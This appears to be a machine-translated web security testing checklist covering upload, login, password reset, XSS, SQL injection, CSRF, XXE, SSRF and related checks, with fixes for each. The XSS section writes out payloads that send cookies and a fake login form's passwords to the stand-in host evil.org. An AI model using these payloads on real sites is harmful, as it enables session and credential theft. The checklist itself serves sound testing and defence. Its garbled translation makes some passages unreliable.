Web security testing checkpoints
Upload
1. bypass the file upload function check
2. Upload the file size and the number of restrictions
Registration function
1. The registration request is secure transmission
2. Password Complexity whether a background check when registering
3. Activate the link test
4. Repeat registration
5. Batch Registration Issues
Log function
1. Log on whether the request is secure transmission
2. Session Fixation: Session fixation attack (session fixation attacks) is to use the same server session mechanism, certified and authorized by the hands of others, and impersonation.
3. The key Cookie whether HttpOnly: If Cookie HttpOnly flag is set, you can avoid JavaScript XSS occurs when read Cookie.
But many Cookie JS need to use front-end. So here only need to focus on key Cookie, that is, the session identifier uniquely identifies the user and logged in to add this property.
4. login request to limit the number of errors
5. "Remember me" function: Check the "Remember Me", Cookie recorded in the user name and password information
6. The local store sensitive information
Verification code function
1. The disposable codes
2. verification code to bypass
3. SMS verification code bombing: If this interface has no restriction policies, would have been maliciously use
Forgot your password function
1. By phone number back: but because the program design is unreasonable, leading to bypass the SMS verification code to modify someone else's password. (Using burpsuite capture, modify the response value true)
2. E-mail back
Password security requirements
1. Password Complexity Requirements
2. Password Keeping Requirements
Test lateral override : the session shared among different users, other data may be illegal operation
Vertical ultra vires test : a lot of front-end application simply by judge, or a low-privileged role can not see the corresponding menu, but do not currently logged in user has permission background
XSS test
XSS (Cross Site Scripting): malicious attacker to insert malicious Web page using Script code, when a user browsing the page, embedded inside a Web Script code is executed, so as to achieve the purpose of malicious users
1. reflective XSS: param2 use request parameter, for XSS injection, or may be provided as any other executable js jump statement
param2=<script>document.write('<imgsrc="http://evil.org?grabcookie.jsp?cookie='+encodeURI(document.cookie)+'"/>')</script>
This site has logged-on user to click, cookie will be sent to evil.org up.
Disposition: escape output of special characters, particularly '' <> a few.
2. The storage type XSS: published in forum posts, forum flawed assumptions, the following can be injected JS content in the post:
<script> document.body.innerHTML="<h1>PleaseLogin</h1><form action=http://evil.org/grabpassword.jspmethod=post><br>User name:<input type=text name=user><br>Password:<inputtype=text name=password></p><input type=submit name=login></form> </script>
When other users browsing the posts, the login box will pop up, which is injected into the page XSS generated, if you enter the account password, it is sent to the hacker
Disposition: special character escape output, in particular following several ' "<>
3.DOM type XSS: DOM based XSS sample type, compared with Reflected, Stored XSS server side execution issues concerned belongs, DOM based XSS is client (browser) side execution issue
Step1: The section below the request hash, JS performed dynamically generated by the client XSS injection
http://www.webapp.com/example.jsp?param1=value1#\u003ciframeοnlοad=alert('xss')\u003e
Step2:动态生成:<divid="m"><iframeοnlοad="alert('xss')"></iframe></div>
The more difficult test, generally need to read the JS code page, to analyze. There is no fixed test procedures, we all still need to learn. Not as mandatory, WebInspect can be swept.
Disposition: escape output of special characters, particularly ' "<>
SQL Injection Testing
The basic principles of SQL injection attacks is by constructing a special input parameters, forcing the back-end database to perform additional SQL statements, so as to achieve the purpose of access to the database data.
These input parameters often contain malicious SQL injection statements spooler no filtering of these parameters, and database query tools used for splicing, leading to leakage of sensitive data.
In the process of constructing dynamic SQL statements, in addition to the special characters SQL injection caused by improper handling, improper error handling will bring a lot of security risks for the Web site.
The most common problem is the detailed internal error message is displayed to the attacker. These details will provide important clues about the site's potential pitfalls for the attacker.
In the process of SQL injection, if the Web server closes the wrong echo, it is not to secure it? The answer is clearly no, if the attacker can still "blind" test SQL command injection technique successfully.
The so-called "blind" is done when the server is not wrong echo injection method, the attacker must find a way to verify whether or not injected SQL statements executed.
"Blind" is divided into two types: time-based blind and Boolean blinds.
Test method (black box): sqlmap is an automated SQL injection tool, its main function is to scan, find and exploit a given SQL URL injection vulnerability,
Test Method (white box): If the database is a persistence framework MyBatis project, and his sqlmap are programmed in a manner using # {xxx} way, instead of using $ {xxx} way, there is no problem SQl injection.
Note: sqlMap try not to use $; $ using Statement (string concatenation), will be injected into the problem. # Using PreparedStatement (similar to the pre-compiler), will escape to the database, it will not be injected into the problem; SQL injection security issues like the former prone, it is recommended to use mybatis #.
Write interface test limit
Advice: write large interfaces (such as uploading) make the necessary restrictions .
CSRF test
CSRF (Cross-site requestforgery), Chinese name: Cross-site request forgery. User C at A to exit the case, the browser B, B with C unauthorized access to the session A.
Check:
Ø Is there a random number of CSRF defense. Verification code, csrf_token are all. There is (by)
Ø Verify referer. There is (by)
Ø request parameters can speculate, no CSRF defense mechanisms. (Not through)
a test, it is necessary to write all the interface checks, can be used in the following manner, record interface, the tags have been checked.
Repair recommendations:
Ø Method 1: verification code
verification code system user must interact with the application in order to complete the final request. Thus, in general, well curb codes CSRF attacks.
However, this approach does not seem very good ease of use, and there are many to bypass the mechanism for simple graphical verification code. CSRF defense of an aid
Ø Method 2: Referer verification
URL when the browser sends a request to initiate usually indicate when the Referer HTTP request.
By Referer we can determine whether a request is initiated under the same domain to protect against CSRF, but Referer may contain sensitive information and in some cases can be forged.
So we can not rely on Referer as the primary means of defense CSRF, but you can monitor the occurrence of CSRF attacks by Referer.
Ø Method 3: Token authentication
at the request of the original parameters unchanged, a new random, unpredictable Token parameter is the currently the most common and effective manner.
In the former back-end data processing will first Token parameter validation, the user only when consistent with the user request Token Session (or Cookie) in the Token, will believe the request is legitimate.
Because of Token, the attacker will not be able to construct a complete request for the implementation of CSRF attacks, thus ensuring a secure website or system.
Disclosure of sensitive information
SVN information disclosure: information database account and password;
page disclosure of sensitive information: Some WEB application, in response to the client's return, contains sensitive information, such as passwords.
Directory Traversal
In web applications, file directory list display as shown below, will bring some security risks (file list server)
CRLF test
CRLF is HTTP response splitting vulnerabilities head. Is CR and LF characters entered by the user does not strictly due to filtering.
Advice: filtering CR and LF characters. Or escape
Read arbitrary files
Read arbitrary files belonging to a file operation vulnerability, the general vulnerability can read any file to read configuration information even important system files.
The worst case, it could lead SSRF, and then roam into the net.
URL redirection test
Test URL Redirection
open Internet Explorer browser in the host computer, and enter your specified for the redirect URL.
Verify whether the Web page in Internet Explorer on the guest virtual machine is turned on.
Repeat this process for each URL to be tested.
Clickjacking ClickJacking
Click hijacking (ClickJacking) is a visual deception. Are roughly two ways, first, the attacker uses a transparent iframe, overlaid on a page, then convince a user to operate on the page, then the user will click transparent iframe page unknowingly; two is covered by an attacker using a picture on the page, the page of the original blocking position meaning.
TWENTIETH
In simple terms, XXE is XML external entity injection. When allowed to refer to external entities, by constructing a malicious content, it is possible to read arbitrary files, execute system commands, network port probes, attacks within the network sites and other hazards.
For example, if the program you are currently using is PHP, you can libxml_disable_entity_loader set to TRUE to disable external entities, which serve the purpose of defense.
SSRF
SSRF (Server-Side Request Forgery: server-side request forgery) is a form by an attacker construct a security breach that initiated the request by the server. Under normal circumstances, SSRF is to target the site's internal systems. (Because he is accessible from within the system, all of which can attack the internal network can not access external system, that is, when the target site middleman)
CORS problem
Cross Origin Resource Sharing (CORS), by definition, that cross-domain sharing, when two different domain access, the default is not accessible, the need to address the problem CORS.